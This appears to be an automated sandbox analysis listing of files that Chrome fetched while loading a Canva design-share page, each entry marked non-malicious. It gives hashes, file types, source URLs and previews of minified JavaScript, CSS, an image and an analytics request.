                                                                SHA-256:864694C4A2AFA22F730EBDA3DD7AF3070CABA3BA03646DAC7D07C3C9FAA7C0B5
                                                                SHA-512:85A28314950BABD1CF367E33BD82E238771BB98C34C706735280EC3C233CFC30C679E8B91F2FEBA14EFB6A9AFC502E36CAD48A3F10253FE09C27C7D08D497E05
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:/*! For license information please see 73ed2ae6ad608ced.vendor.js.LICENSE.txt */.(self.webpackChunk_canva_web=self.webpackChunk_canva_web||[]).push([[5436],{710665:(e,t,n)=>{!function(){var e="undefined"!=typeof window?window:n.g,r={};for(var i in function(e,t,n){var r;function a(e){var t=0;return function(){return t<e.length?{done:!1,value:e[t++]}:{done:!0}}}var o="function"==typeof Object.defineProperties?Object.defineProperty:function(e,t,n){return e==Array.prototype||e==Object.prototype||(e[t]=n.value),e};var s=function(n){n=["object"==typeof globalThis&&globalThis,n,"object"==typeof e&&e,"object"==typeof self&&self,"object"==typeof t&&t];for(var r=0;r<n.length;++r){var i=n[r];if(i&&i.Math==Math)return i}throw Error("Cannot find global object")}(this);function u(e,t){if(t)e:{var n=s;e=e.split(".");for(var r=0;r<e.length-1;r++){var i=e[r];if(!(i in n))break e;n=n[i]}(t=t(r=n[e=e[e.length-1]]))!=r&&null!=t&&o(n,e,{configurable:!0,writable:!0,value:t})}}function c(e){return(e={next:e}
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (7855), with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):7855
                                                                Entropy (8bit):5.7635629552134
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:8423B5B890DA6F9C13A3CAA71B6094DD
                                                                SHA1:620AC11E8A7F296BB7CDC496ADD49DCF116A0AFB
                                                                SHA-256:77B2B045B35EB2F5F0D2A9428B3D5BFD4CB8706BA9D1014984491065C76CDD95
                                                                SHA-512:AA622E8C7771DC134980536CB2D332E0EAC8DEF7056B992B88502C116DF9D10B33AF6F4D6F0138EDBA86D6EEB03B555EB2F396DF19DE18C091D91F178417D2CB
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://www.canva.com/cdn-cgi/challenge-platform/h/b/scripts/jsd/6790c32b9fc9/main.js?
                                                                Preview:window._cf_chl_opt={cFPWv:'b'};~function(V,g,h,i,j,n,o,v){V=b,function(d,e,U,f,C){for(U=b,f=d();!![];)try{if(C=-parseInt(U(512))/1+-parseInt(U(496))/2+-parseInt(U(508))/3*(parseInt(U(514))/4)+parseInt(U(557))/5+parseInt(U(552))/6*(parseInt(U(583))/7)+-parseInt(U(588))/8+-parseInt(U(550))/9*(-parseInt(U(546))/10),C===e)break;else f.push(f.shift())}catch(D){f.push(f.shift())}}(a,483524),g=this||self,h=g[V(589)],i={},i[V(491)]='o',i[V(537)]='s',i[V(553)]='u',i[V(570)]='z',i[V(503)]='n',i[V(509)]='I',j=i,g[V(560)]=function(C,D,E,F,a0,H,I,J,K,L,M){if(a0=V,null===D||D===void 0)return F;for(H=m(D),C[a0(572)][a0(492)]&&(H=H[a0(554)](C[a0(572)][a0(492)](D))),H=C[a0(579)][a0(510)]&&C[a0(584)]?C[a0(579)][a0(510)](new C[(a0(584))](H)):function(N,a1,O){for(a1=a0,N[a1(493)](),O=0;O<N[a1(528)];N[O]===N[O+1]?N[a1(577)](O+1,1):O+=1);return N}(H),I='nAsAaAb'.split('A'),I=I[a0(513)][a0(576)](I),J=0;J<H[a0(528)];K=H[J],L=l(C,D,K),I(L)?(M='s'===L&&!C[a0(525)](D[K]),a0(500)===E+K?G(E+K,L):M||G(E+K,D[K])):G(
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (65455)
                                                                Category:dropped
                                                                Size (bytes):210895
                                                                Entropy (8bit):5.281280279944797
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:F65C8213757311AB852D142869EFA93A
                                                                SHA1:8540553011338995CC0B438BA5BC94A09CB9BC07
                                                                SHA-256:8C7A7D1C569A32369FA76D8DEE255C8D1A2CC47748C4BD196EEF9597346C5DD4
                                                                SHA-512:BE01695F41C7C695CD1BCF7BE11F8A55D25103B2D3BBD9CA616C6066528032E86BF5778968F0161ED346A9B83CDD86675A977AD66762BA339B41F5B9EEFD86AB
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:/*! For license information please see 234d3129b1321098.vendor.js.LICENSE.txt */."use strict";(self.webpackChunk_canva_web=self.webpackChunk_canva_web||[]).push([[2653],{68743:(e,t,n)=>{n.d(t,{Q:()=>a});var r=n(38672);function a(e){var t=e.children,n=e.render,a=t||n;return"function"!=typeof a?null:(0,r.S)(a)}a.displayName="Observer"},433581:(e,t,n)=>{n.d(t,{DT:()=>o.D,FY:()=>o.F,Pi:()=>u.P,Qj:()=>s.Q,fv:()=>c.f,jd:()=>l.O});n(809991);var r,a=n(321645),i=n(356158),o=(n(38672),n(391367)),l=n(992449),u=n(350666),s=n(68743),c=n(764947);n(433579),n(548495);(0,i.z0)(a.m);r=l.O.finalizeAllImmediately},350666:(e,t,n)=>{n.d(t,{P:()=>d});var r,a,i=n(667294),o=n(391367),l=n(38672),u="function"==typeof Symbol&&Symbol.for,s=null!==(a=null===(r=Object.getOwnPropertyDescriptor((function(){}),"name"))||void 0===r?void 0:r.configurable)&&void 0!==a&&a,c=u?Symbol.for("react.forward_ref"):"function"==typeof i.forwardRef&&(0,i.forwardRef)((function(e){return null})).$$typeof,f=u?Symbol.for("react.memo"):"
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (45034)
                                                                Category:dropped
                                                                Size (bytes):45035
                                                                Entropy (8bit):5.400557193761079
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:C4D5335B2B69C6998EE34F5F7B3E246F
                                                                SHA1:AF0AE01ECCEE153877976D5C7D6500AA9C380B60
                                                                SHA-256:7EDA47B0C02C44BDAA43A5B14857F1257DDBD620B0397C32AA3AE8BAF769AB55
                                                                SHA-512:1C62C5D29C56848C258701F2E6B39E2152A3CACEB2C96F19ADB8542FDCC233F42BD0FAE9D03C8EA04F6B4490D0B69FD24F62B6D18A14A31D87E24906CFC88C58
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:"use strict";(function(){function St(e,r,a,o,c,u,g){try{var _=e[u](g),p=_.value}catch(f){a(f);return}_.done?r(p):Promise.resolve(p).then(o,c)}function Ot(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var u=e.apply(r,a);function g(p){St(u,o,c,g,_,"next",p)}function _(p){St(u,o,c,g,_,"throw",p)}g(void 0)})}}function P(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):P(e,r)}function Oe(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Ce(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Oe(e,c,a[c])})}return e}function _r(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (38170)
                                                                Category:dropped
                                                                Size (bytes):38234
                                                                Entropy (8bit):5.243846144069231
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:D46341CADA2106FF7A9C41604094C66E
                                                                SHA1:E824CEB4A85F820B7C8B101D5B1709FCB9574E2F
                                                                SHA-256:53179874AABB77CB9735433E533A0E0E1758B686DC727D7BB241F6E423297E92
                                                                SHA-512:9EE7941AD66E33BD2E215E04CE62E1F69ADF70CD480CA045F260B7CBAB9233655C82815F228B106A2C57962CC35EC9F0CEE122816FDA34554A3CC420260D0D58
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:(()=>{"use strict";var e,r,t,f,s,n={},c={};function i(e){var r=c[e];if(void 0!==r)return r.exports;var t=c[e]={id:e,loaded:!1,exports:{}};return n[e].call(t.exports,t,t.exports,i),t.loaded=!0,t.exports}i.m=n,i.amdD=function(){throw new Error("define cannot be used indirect")},i.amdO={},e=[],i.O=(r,t,f,s)=>{if(!t){var n=1/0;for(u=0;u<e.length;u++){for(var[t,f,s]=e[u],c=!0,a=0;a<t.length;a++)if((!1&s||n>=s)&&Object.keys(i.O).every((e=>i.O[e](t[a]))))t.splice(a--,1);else if(c=!1,s<n)n=s;if(c){e.splice(u--,1);var d=f();if(void 0!==d)r=d}}return r}else{s=s||0;for(var u=e.length;u>0&&e[u-1][2]>s;u--)e[u]=e[u-1];e[u]=[t,f,s]}},i.n=e=>{var r=e&&e.__esModule?()=>e.default:()=>e;return i.d(r,{a:r}),r},t=Object.getPrototypeOf?e=>Object.getPrototypeOf(e):e=>e.__proto__,i.t=function(e,f){if(1&f)e=this(e);if(8&f)return e;if("object"==typeof e&&e){if(4&f&&e.__esModule)return e;if(16&f&&"function"==typeof e.then)return e}var s=Object.create(null);i.r(s);var n={};r=r||[null,t({}),t([]),t(t)];for(var c=
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:Unicode text, UTF-8 text, with very long lines (24786)
                                                                Category:downloaded
                                                                Size (bytes):94163
                                                                Entropy (8bit):5.646861477952522
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:9FE1ACED08392890788F64538DBD1E0F
                                                                SHA1:09EA7961BE9BE3846339F84B1F7F99AE723F0D59
                                                                SHA-256:843951D9AF7112AB2A7486B8B1E1F899C5AA3ABDF758B078CBD090DDE5C9AF24
                                                                SHA-512:1E45034733D7569FC7DBC342C8DFB04C6D2FB2E00530B7B6F19333B99E0474A40336EDB27394BBD9676C989D6A757AB7B984701B99491EC24DDC399C18F33CAC
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://chunk-composing.canva.com/chunk-batch/4c1d96dedbe87d00.ltr.css+812ae2bc1fdfc220.ltr.css+0400cd3bf23b6de4.ltr.css+c9bf091720f7f1c3.ltr.css+ca10385ab7f3657c.ltr.css+d577c820f40defa1.ltr.css+3b2abf75f18bcd79.ltr.css+c43f123d28770649.ltr.css+6f7e30bbdee50196.ltr.css+054f7018cb8117b3.ltr.css+60522e48f8e412f4.ltr.css+d5e38674d90c7507.ltr.css+202e686830bf1e42.ltr.css+fea40c91c55f6b33.ltr.css+54ae5ed0ad87dd5d.ltr.css+c19de11548c4811c.ltr.css
                                                                Preview:/* __FILE_CONTENT_FOR__:4c1d96dedbe87d00.ltr.css */.._2E9Y8A{color:inherit;font-size:inherit;margin:-4px;max-width:unset;vertical-align:baseline}._8vlbIg ._2E9Y8A{margin:-8px}.WoE5Nw{display:flex}.UUZlXw{flex:1}.rs0JiQ{min-height:32px}.Q8LDuw{margin:-4px}.kz6U6Q{color:var(--5F8MFw);display:block;text-align:center}.XvuZxg,._vXveQ{word-break:break-word}.nk6qOQ{align-items:stretch;display:flex}.J7cYGg{align-items:center;display:flex;flex:0 0 auto;height:-webkit-fit-content;height:-moz-fit-content;height:fit-content;margin-top:-1px;min-height:24px}.SpgRRg{flex:1;margin-left:8px}.u6sYBQ>.SpgRRg{display:list-item;list-style:disc outside;margin-left:16px}.u6sYBQ>.SpgRRg::marker{font-size:calc(var(--wQwVGw, .1rem)*14)}.J7cYGg,.u6sYBQ>.SpgRRg::marker{color:var(--VNXpSw)}./* __FILE_CONTENT_FOR__:812ae2bc1fdfc220.ltr.css */.html{--safe-area-inset-top:0px;--safe-area-inset-bottom:0px;--safe-area-inset-left:0px;--safe-area-inset-right:0px}@supports (height:env(safe-area-inset-top)){html{--safe-area
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (952)
                                                                Category:downloaded
                                                                Size (bytes):1015
                                                                Entropy (8bit):5.641941724686156
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:58AE789C614566C980B05C9C0BED7F46
                                                                SHA1:BAAF8FB61D2539A0AB94ACF2746AC35E600F3926
                                                                SHA-256:C9574A0D4CBE099FC9470FCFF01B03C9ADA6C69CA4C5B21A7EA8295E41C243B7
                                                                SHA-512:AAA3F94B907824EC1CC7FC258E3CDF3AE8321932BC0BCD556D399204BB2ED75A7033EE5143DEB9867EC42441D3ADAEECE6249EA84075DB75BF56706C5B94A89D
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://static.canva.com/web/ad70b1f05b5f5889.ltr.css
                                                                Preview:.light{--QpnZJg:0.07;--pWZ5jw:0.025}.dark{--QpnZJg:0.15;--pWZ5jw:0.10}@keyframes HrpoWA{0%{opacity:var(--QpnZJg)}25%{opacity:var(--pWZ5jw)}50%{opacity:var(--QpnZJg)}to{opacity:var(--QpnZJg)}}.n7vSfw{background:var(--VNXpSw);opacity:var(--QpnZJg)}.S_ZkxQ{animation:HrpoWA 1.4s infinite}.abYU1Q{border-radius:9999px}.abYU1Q,.ccpanQ{padding-top:100%;width:100%}.UG13Dw,.ccpanQ{border-radius:8px}.UG13Dw{height:100%;width:100%}._4RR_JA{border-radius:0}._2PfzsQ,.uYOLFg{border-radius:8px}.uYOLFg{height:calc(var(--wQwVGw, .1rem)*11)}.KNA9cA{border-radius:8px;height:calc(var(--wQwVGw, .1rem)*14)}.E3Eshw{transform:scaleX(-1) rotate(45deg)}[dir=rtl] .E3Eshw{transform:rotate(45deg)}._8aslVA{display:block}._8aslVA>img,._8aslVA>svg{display:block;height:100%;width:100%}.h7eUeg{height:0;position:relative;width:100%}._3FYLtg{display:grid;grid-template:minmax(0,1fr) /minmax(0,1fr);height:100%;left:0;position:absolute;top:0;width:100%}._3FYLtg>*{grid-area:1/1}./*# sourceMappingURL=sourcemaps/ad70b1f05b5f588
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (8645)
                                                                Category:downloaded
                                                                Size (bytes):8708
                                                                Entropy (8bit):5.678587280175803
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:AB90FFAC41C8C04D8BB9C2F955B659B5
                                                                SHA1:5E2AF52530E354C8FCFB6310015FD5EBA2CDA80B
                                                                SHA-256:A25FCE0C8DC9AC20E83C0D06559F37B2E96EBF16A88D47BC1991A0633A993466
                                                                SHA-512:C8CCABB5261262C6F9003F68A7A72555ECC19C0B67A0A161D0ECAD89D17F5E568E5CCD549ACC9E7781F9AD53E67795F6C656CC66E9C2FEB1B128C6DFAC4370B1
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://static.canva.com/web/e7c6bc1d981983be.ltr.css
                                                                Preview:._9Mb__A{border:0;box-sizing:border-box;list-style:none;margin:0;padding:0}.TsqTMg{justify-content:normal}.VpI6pA{justify-content:center}._NLu4Q{justify-content:start}.WkHsXQ{justify-content:flex-start}.KWHRmg{justify-content:end}._6Wu_wQ{justify-content:flex-end}._9Jwa9A{justify-content:space-between}.SdPLvg{align-items:stretch}.PbKupw{align-items:center}.IQbIXQ{align-items:start}.Pv4hww{align-items:flex-start}.l14TtA{align-items:end}.pjmL_Q{align-items:flex-end}.KYVkRQ{align-self:stretch}.W6llkg{align-self:center}._8a9K5A{align-self:start}.Q91wWg{align-self:flex-start}.JN1M0g{align-self:end}.mZB6gA{align-self:flex-end}.light{--Cq9uKQ:#f6f7f8}.dark{--Cq9uKQ:hsla(0,0%,100%,.15)}._6hNByg{background-image:linear-gradient(45deg,var(--Cq9uKQ) 25%,transparent 25%),linear-gradient(-45deg,var(--Cq9uKQ) 25%,transparent 25%),linear-gradient(45deg,transparent 75%,var(--Cq9uKQ) 75%),linear-gradient(-45deg,transparent 75%,var(--Cq9uKQ) 75%);background-position:0 0,0 8px,8px -8px,-8px 0;background-
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (2744)
                                                                Category:dropped
                                                                Size (bytes):231925
                                                                Entropy (8bit):5.55238430293934
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:7B5B07F22ECAB303291A3A0DB21479D8
                                                                SHA1:3D510FCA3E086F3F31D64B866230D682F49DF63B
                                                                SHA-256:9C6050D1E06CADCBC1C6AF280554439309B811D0C98670E77B87C84B9ABF95CD
                                                                SHA-512:525065D19CDF7599F8499AA4F4B568E0D4E907B9F1CD55A28CA3210AB287B4318454838C90D7AD8E1ABE0440C745239E78C53E4F0780A8B62BDC4A4716517648
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:"use strict";this.default_gsi=this.default_gsi||{};(function(_){var window=this;.try{._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x2440000, 0x1c04, ]);.var aa,ba,ca,da,t,ea,fa,ha,ja;aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};da=ca(this);t=function(a,b){if(b)a:{var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writab
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (3869)
                                                                Category:downloaded
                                                                Size (bytes):9610
                                                                Entropy (8bit):5.546101211065666
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:B3C89B97F20AE0F28C28907D6DE280A5
                                                                SHA1:BC8CA9E6F2BE3F6D92758A41AB9F8229D0308189
                                                                SHA-256:50228BFC7DCBFECDE156B503D972E813D585D132CDA29C89B3B9F7DF04B581EE
                                                                SHA-512:B749CDE7C98210AC656A33AD7FA54DC7CE7858C256B77F41D462F691F5AEFFE282690639D4927602BA822EF43B227A9EECC4306A9366D18F43F71D9E9CBE290E
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://chunk-composing.canva.com/chunk-batch/118052af16110a6a.ltr.css+3ecf51295dcd9309.ltr.css+b9997efbfcc9862a.ltr.css+92f769a158e87071.ltr.css+44120d0e86f58fdd.ltr.css+70f83d7290d33057.ltr.css
                                                                Preview:/* __FILE_CONTENT_FOR__:118052af16110a6a.ltr.css */..E_yBwg{overflow:hidden;position:relative}./* __FILE_CONTENT_FOR__:3ecf51295dcd9309.ltr.css */..m1kM0g{display:flex;justify-content:center}.cXyYTw,.mJrg7w{position:relative;width:100%}.cXyYTw{height:100%}.FkOsrQ,.H2v5kg,.atdaCQ,.nlmB9g{position:absolute}.FkOsrQ{overflow:hidden}._1jVKqQ{box-sizing:border-box;font-family:Canva Sans,Noto Sans Variable,Noto Sans,-apple-system,BlinkMacSystemFont,Segoe UI,Helvetica,Arial,sans-serif;height:100%;position:absolute}.RhrNhw{align-items:flex-end;display:flex;justify-content:inherit;min-height:100%;text-align:inherit;text-overflow:clip;white-space:pre;width:100%}.ZLwX1w{flex:1}.NuU3Qw{font-feature-settings:"kern" 0,"calt" 0,"liga" 0,"clig" 0,"dlig" 0,"hlig" 0;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;-webkit-text-size-adjust:none;-moz-text-size-adjust:none;text-size-adjust:none;font-family:unset;font-kerning:none;font-synthesis:none;font-variant-ligatures:none;letter-spa
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (7360)
                                                                Category:downloaded
                                                                Size (bytes):7423
                                                                Entropy (8bit):5.735987288905557
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:E82F03D6187FB6EAA80CA7B54A78BE89
                                                                SHA1:7D181EDA21484BB7FFC7782E14252A3D003E79DA
                                                                SHA-256:1D9B2F68382D8C02728B6015300A7F73ED0CF37648DA93B4ED41DAF091BF53B6
                                                                SHA-512:A06CB6B9CE6CA2F38713D9DE33C90651AEEFABABCFF7FF78BC1ED5D89D1CE35C8AEF10ABB79E5C185CB22F12B9DD8D0A400E5BB77AEB6F9D89A64D3F2988BA9D
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://static.canva.com/web/eaea7aca0562f08c.ltr.css
                                                                Preview:.USE2Rg{border-radius:9999px;display:inline-flex;height:16px;line-height:16px;position:relative;vertical-align:middle;white-space:nowrap}.USE2Rg.USE2Rg{padding:0 6px}.vCLpaw{border-radius:9999px;box-sizing:border-box;height:20px;justify-content:center;line-height:20px;min-width:20px}.vCLpaw.vCLpaw{padding:0 3px}@media (-webkit-device-pixel-ratio:2),(resolution:2dppx){.USE2Rg{line-height:15px}.vCLpaw{line-height:19px}:root .USE2Rg,_::-webkit-full-page-media,_:future{line-height:16px}:root .vCLpaw,_::-webkit-full-page-media,_:future{line-height:20px}}.wz1lJg{align-items:center;display:flex;margin:0 -1px}.wz1lJg.LxsoTQ{padding-right:2px}.ZQcUXA{border:0;cursor:pointer;margin:0;transition:background-color .15s ease-in-out}.xjABfw{outline:none}@media (-moz-touch-enabled:1),(pointer:coarse){.ZQcUXA:after{border-radius:9999px;content:"";height:40px;left:calc(50% - 20px);position:absolute;top:calc(50% - 20px);width:40px}}._3_6cwQ{background-color:var(--KtXlRg);color:var(--6u-yJQ)}._3_6cwQ._1A_
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 157x199, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                Category:downloaded
                                                                Size (bytes):2802
                                                                Entropy (8bit):7.932268201999466
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:69845B1A57FF9F9C333DD48F0FAB9FB2
                                                                SHA1:66752B83A57628C3DA89AFEFEA2B2EECE103E452
                                                                SHA-256:D2DA1FE4DD4D9550E6348A7836C30A2F04028867A7B1D30748D20340C44579AD
                                                                SHA-512:B98ABF2B325AFD20FDFA935FD8FEBDA501748E4F4AB3A3A3A75200CEB166E5772916B21D69ACA9439090B07F040C1AA674BB8477798BEE7A72D87471FAEEA61D
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://media.canva.com/v2/image-resize/format:JPG/height:200/quality:75/uri:s3%3A%2F%2Fmedia-private.canva.com%2F9_BUA%2FMAGNRi9_BUA%2F1%2Fp.jpg/watermark:F/width:157?csig=AAAAAAAAAAAAAAAAAAAAAO4BwRttWcX2kfdIWKqbOlrrYMuz-ltAltRdrV8pwETq&exp=1724437593&osig=AAAAAAAAAAAAAAAAAAAAALh84wPLzOod6scRpR-Q0eN6k0HcVNWywG4Qhr7M-PNX&signer=media-rpc&x-canva-quality=thumbnail
                                                                Preview:RIFF....WEBPVP8 .....5...*....>I..D....(.(.......`^.....&}kj;..5....QL6.E.-......97...w.W.s.kW.(...........[..Jq].....Q7.g.%..m'2y>.Wm..".^p...uMy..">q...,.....h2.m.a3..:.<._:_k..?...U......4._....vi..]...vdL.]]),...*..Ph.YP..:..S.P.4....&..D.0M".Qc-^..ML..l+[.{..`....._>E!$...|..z...8.I..9!$.x..../!.5............._.....".5.mB.....<...TF.D..T...I.xi8..U.~D.*L.v.Sz...y...Qh.m..|...F"..r.K..t.H.u.t0.x.!..!$./..}}1...<.........S&.._.......h...P-B./.'^...................(?..S..tF.....?.E...u.+n.{).q...R.P.5..X........@.m.\...,1<.a2.A`K.~..*C6..X{YmQ"....3|y.}~.U+I.a^..L-..*.l..u..}x..b.xg5......Yf.n..CC.]...38...xV...2.....k~....0]...(..../.@s..!....q......n....4.8Q.*....F.0'......1...H.R.L..CR........v.@Jd.;.b.wR.3<.X...|...T...W{..Wi.#oA...ahB....U.P.(...U.?,I......."W.]...U6......&b`..X.l.K.!T.s.F.M.....Y.4..i.+]Jd58...K'#l..#.*=.....B..I.>.....~k.`.&.....w...&....*.... ..`.@+a?x...gt....W.E.*{......%#..w....%...3{o.yc>U.~..h j]}.f.|Bw{>V:.8..
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (5945)
                                                                Category:downloaded
                                                                Size (bytes):329595
                                                                Entropy (8bit):5.573115435202742
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:F6367C6E8CD5C5A791C7948725CEC64E
                                                                SHA1:A8B999740CDDF82FC4473E863638D5A3C6BFCE93
                                                                SHA-256:B89EC434540011C84AA49F1FABFBCAF4E92FA87D381866149151F56F05D5CC30
                                                                SHA-512:0B6B4F0D411D9DF48CD8D987A162A613A6B14CD30EDC54363F4FA9CC76965DD6472CDEA966BB81E131F26457306BFAA8EB09166872B7953619B7DB4CE30DB841
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://www.googletagmanager.com/gtag/js?id=G-EPWEMH6717&l=dataLayer&cx=c
                                                                Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"vtp_signal":0,"function":"__c","vtp_value":0},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_dma","priority":13,"vtp_delegationMode":"ON","vtp_dmaDefault":"DENIED","tag_id":105},{"function":"__ogt_1p_data_v2","priority":13,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (1285)
                                                                Category:downloaded
                                                                Size (bytes):2653
                                                                Entropy (8bit):5.509707829642766
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:1AD26AB01A3F721C701EB22649733820
                                                                SHA1:AFD301D199A7279ACE6308711E014CBC312762C3
                                                                SHA-256:9465D7B9904EBBF0B6DC2F3880670EDA24546278439F7CD1E4988BA93CDDBBA9
                                                                SHA-512:110BB7CA01AE5F63E78414721B1250DB2AD114A0F394F7928DE701275F9896B31AB1E2F4FB2B549B10F58E4FEA3C6A4B04907B791100CA9DC4EBE600E135C12A
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://ct.canva.com/g/collect?v=2&tid=G-EPWEMH6717&gtm=45je48l0v872399471z8812729902za200zb812729902&_p=1724421764514&gcd=13l3l3l3l1l1&npa=0&dma=0&tag_exp=0&cid=650264388.1724421767&ecid=463242634&ul=en-us&sr=1280x1024&_fplc=0&ur=US-NJ&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&are=1&frm=0&pscdl=noapi&ec_mode=c&sst.tft=1724421764514&sst.ude=0&_s=2&dl=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGOmfvTQik%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink%26utm_source%3Deditor&dr=&dt=Canva%20Design&sid=1724421767&sct=1&seg=0&en=new.user.engagement&ep.gtm_web_details=GTM-TZPTKRR%20%7C%20278&ep.event_id=1724422386102_172442270395875&ep.custom_dicbo=not%20set&ep.custom_consent_gtm_outbrain=yes&ep.custom_consent_gtm_fpc_rtid=yes&epn.custom_data_newSession2=1&ep.custom_device_category=desktop&ep.custom_event_name=new.user.engagement&ep.custom_quantity=0&ep.custom_step=not%20set&ep.custom_user_type_by_user_id=guest&ep.event_action=no-value&ep.custom_doctype_id=TACQ-gtv2Yk&ep.custom_product_variant=web-2&ep.custom_country_code=US&_et=3&tfd=11189&richsstsse
